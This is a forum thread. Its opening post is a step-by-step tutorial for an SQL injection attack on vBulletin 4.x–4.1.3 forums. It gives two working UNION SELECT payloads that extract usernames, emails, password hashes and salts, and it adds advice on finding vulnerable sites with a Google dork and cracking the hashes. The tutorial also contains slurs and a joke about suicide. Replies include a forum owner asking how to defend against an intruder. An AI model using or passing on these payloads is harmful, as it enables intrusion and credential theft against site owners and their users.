(adsbygoogle = window.adsbygoogle || []).push({});

How To Hack VBulletin Forums ver 4.x - 4.1.3

Okay Ladies, shall we begin?

Part 1: The Beginning

First you are going to need some tools. You don't need to download any gay cracking/hacking software.
Just two little programs that anyone that is into web development should already have:

You must login or register to view this content. I use it for firefox cause I.E. is lame, and if your using I.E. you should probably just You must login or register to view this content.
You must login or register to view this content. Another firefox add-on
Okay these both I think are for firefox so if your using another browser (which you shouldn't be) then try to find a program that does the same as these.


Part 2: Is your mom asleep yet?

Now that you have made sure your parents are in bed, and you have installed the above software we need to find a site. What we are looking for is any VBulletin© <-- LoLz Site ver 4.x-4.1.3.
Once you have located your target you need to go to the community tab on the forum page, and then select groups (or just type in [url]www.yourvulnerablesite.com/group.php[/url]) *Note some sites
you will have to register to see their groups*. Okay so you have finally located the groups section, peeked out your door to make sure your mom was still asleep, and refilled your mountain dew.
Now locate an actual group:

You must login or register to view this content.

So now I choose the chinese group, why you ask? I don't know...secretly no one really likes them, j/k no flaming it was a joke. Okay now the issue is, we need the actual group id, and we are not getting
it by hovering over the name of the group. This is where firebug comes in handy, now I know there are gagillion ways of doing this, but again I'm making this for the complete noob. What you want to do is
right click the group name "chinese", then click 'Inspect Element' on the pop-up dialog. Now what we are looking for is the line underneath the header for the group.

    <ul class="controls">

<li>

<a class="textcontrol" href="https://www.nextgenupdate.com/forums/group.php?groupid=1173&do=join" rel="nofollow">

You can see from the "ul class" that the groupid is 1173

You must login or register to view this content.

Part 3: I Always Feel Like Somebody's Watching Me

Now that you have looked out of the crack in the blinds for the feds, and muted that Miley Cyrus song so you can listen for black helicopters we need to left click on the name of the group "chinese" and find a post that they have made. If no post exists for the group, find another group, or join that one and make a post. Once you see a post that they have made, or you have created note the title of the post/thread. Now we want to go to the search area of the forum, and click single search, then select Group Messages, and for Keywords copy and paste the thread title that you created in the group, or the one that the group had already created:

You must login or register to view this content.

Now before you get all excited and bust one off in your scooby-doo tighties, we need to open up Live HTTP Headers, if there is a bunch of mumbo jumbo there we need to hit the clear button, once it's clear, go ahead and click back on the forum, and hit the search button, I know you have been waiting to do it ever since you typed in those keywords. Now click back on your Live HTTP Headers, and you will notice a $hit load of crap that is written in some form of alien technology that only a super elite nerd would understand. That's okay though, trust me, it's going to make since in a second...**Warning Technical Content** This type of injection is a post injection, we are taking advantage of an error in the script of VBulletin and we are going to append some information to the search query, by posting a extra query to the database**
What you are looking for in the Live HTTP Headers section is the post area for the site you were on:

You must login or register to view this content.

Now you may notice 2-3-1,000,000 different post sections but we want the one that says : query on the last line. Which is usually around the top part of Live HTTP Headers. Once you have located that select that row, and click the Replay button on Live HTTP Headers....woah woah woah...what's all this then? Well that's a good question, this is the query that was sent to retrieve the information we searched for, so what we are going to do is add our own little code (muhahaha) and then let it replay (muhahaha). Now that you have it open for editing in the replay mode do what you tricks do best and copy and pastah this code (note, i did not say "my code" as it's not my code, so stfu about it, we all get stuff from other sources).

    &messagegroupid[0]=YOURGROUPID ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1#

Replace YOURGROUPID with the groupid we snagged earlier:

    &messagegroupid[0]=1773 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1#

That's it, we just paste that at the end of the replay and hit the replay button:

You must login or register to view this content.

When you paste in your code, and change out the groupid with the proper id, and hit replay, you will notice the page reload, and next to your search result will be the user name/email/pass/salt .. you can change the userid=1# to whatever user you want to h4x0r i.e. userid=1234# etc.

A few notes :
1. Some sites have not indexed their search tables properly, and you will not be able to use this method *cough* ngu *cough*
2. You have to yield a proper search result for this to work, not a generic page full of possible results. You will notice the search is broken by looking at your keywords used in your search, for this example I will use NGU and search for a post a and you will see the EPiC FAiL :

You must login or register to view this content.

Now judging by that post, you would think that I'm some flamer looking for "guys" on here, when in fact the actual search keywords were "Come on guys".

3. If you run into these issues don't give up on h4x1n and run back to play Ecco on your sega genesis just yet, there is still hope.

Part 4: All By Myself

Now that you have eaten a bottle of pills and chased them with that drain-o under the kitchen sink because you have EPiCally FAiLed at h4x0r1ng we need to act fast because you don't have much time. So put on your favorite Celine Dion album and listen up. What you want to do, is find another user group, note their name, then run over to the search box, and do a search. This time we want to do the "Multiple Content Types" search, and tick the box for Groups, then for the keyword, put in your groups name. Now repeat the process of opening up Live HTTP Headers, and clearing out any data that is there, then hit the search button on the forum. Now you can bring up your Live HTTP Headers again and find the appropriate post field, and hit replay. Once you are in replay mode, append this code to the end of the post:

    &cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt,email) FROM user limit 1,1#

Again we can change out the limit 1,1 to however many users we want to h4x0r.

What Can I Do With Hash(s) and Salt(s)?

Okay you can visit your favorite place to get software and look for passwordspro, then you can add the hash and salt to be cracked and select the md5(md5($pass).($salt)) option *not sure about the context there, feel free to flame me on that one*, then select the type of attack you want to do i.e. bruteforce etc etc. There is a settings menu that lets you adjust the variables for each attack type against the password. That is just one of 1,000's of ways of cracking the password, so feel free to google away on how to crack vbulletin hash's.

Final Thoughts: The moment of truth

Okay guys, this is what I have learned from various sources, too many to quote. No one has compiled a tute like this that I have been able to find. I don't want to hear about how you googled certain content from my post and found a piece here or a piece there. All I can reply to that is "no $hit" it's going to happen, as I did not create nor find this exploit, some 7 yr old in asia found it I'm sure. If you need further help executing this exploit successfully please feel free to PM me. I will not provide help here, as I don't babysit my threads. I hope you guys enjoyed my PERSONAL tute on how to work out this exploit. I tried to make it as basic as possible but I know that some will still have some difficulty with it, and that's fine, I'm here to help.

Flamers, trolls, keep moving past this one, it's not for you. Lets try to keep at least one thread clean from some a$$hole that has nothing better to do than point out this or that instead of taking his 1337 a$$ to the forums and creating his own helpful thread.

Thanks again,
And Remember,
RalphieRocks

*Side Note*

You can use a google dork to find vulnerable sites, basically search google for " Powered by vBulletin 4.1.3 " or something like that, and you can find what your looking for.
And yes, you can try out your own injection techniques here, it's not limited to the two different examples I showed you, be creative and see what you can fetch.
The second example uses a different injection string, as you can clearly see, you are free to research these and edit them to fit your needs, and vBulletins setup.

Here is a YouTube Vid for those still having trouble with this one:


If your having issues with fetching the wrong data from the database, then you really need to google union selecting, and vbulletin databases. I cannot do everything, this is just to help get your foot in the door.

Thanks for sharing great stuff.
But let me ask, how can I reverse this to protect myself so I dont get intruders in my forum.... ?
Please I will need this as I already have an intruder in my forum and I will like to feel a bit more secure blocking him from many accesses......

I will donate $35 to who ever teach me how to protect my forum from hackers on msn or anything if it needs to be private as I already have one in the forum and he can can login as any user including me.

---------- Post added at 02:35 AM ---------- Previous post was at 12:15 AM ----------

I cant send PMs yet due to the 10 post limit. I will put it here and you can send me a PM with contact info if you like.

Is security wise
I have a problem on my forum that a friend of mine he is one of the best vB hackers I have ever hear as he belongs to a big group of hacker from the past. He have access to my forum which is annoying see him do what ever tha heck he wants.

I have chnge servers with a new install same with domain, I have added htaccess with password-protection on the admin folder same on the Mods folder but he still pass by it and even have the guts to tell me what was the password. He can login as me or any other mod. True is that he dont damage the board but is very annoying see someone have access where you really dont want him to and I think is disrespectful from his part.

What I want is to make the forum as secure it can be from hackers to have access into the forum or server ect...

how much you will have to pay if they know you're using a vB cracked?

Old tutorial, I believe I even had a tut like this :$

LOL @ the people hating on the OP, they're probably just mad cause they tried and failed. :lol:

Originally posted by usa

I will donate $35 to who ever teach me how to protect my forum from hackers on msn or anything if it needs to be private as I already have one in the forum and he can can login as any user including me.

---------- Post added at 02:35 AM ---------- Previous post was at 12:15 AM ----------

I cant send PMs yet due to the 10 post limit. I will put it here and you can send me a PM with contact info if you like.

Is security wise
I have a problem on my forum that a friend of mine he is one of the best vB hackers I have ever hear as he belongs to a big group of hacker from the past. He have access to my forum which is annoying see him do what ever tha heck he wants.

I have chnge servers with a new install same with domain, I have added htaccess with password-protection on the admin folder same on the Mods folder but he still pass by it and even have the guts to tell me what was the password. He can login as me or any other mod. True is that he dont damage the board but is very annoying see someone have access where you really dont want him to and I think is disrespectful from his part.

What I want is to make the forum as secure it can be from hackers to have access into the forum or server ect...

There is no such this as 100% safe. If you come across a hacker that knows exactly what he is doing then he is unstoppable. The most you can do its change you admin folder name, secure your htaccess, and minor changes. Normally hackers will use an SQL Injection to break into your forum. We a hacker does an SQL Injection on your forum they are looking for "weak" or "error" coding in your files to gain access to your SQL. They then send false commands to get an MD5 Hash back, which in turn they use a decoder to get a users password.

1. Beat him in REAL life (if you have one )
2. Buy an anti-virus ( you have key loggers trust me )
3. Make a new site and dont tell him the name
4. Go Cry and say if you get in ma account again i Tell my mom

My vB is not Nulled is Licence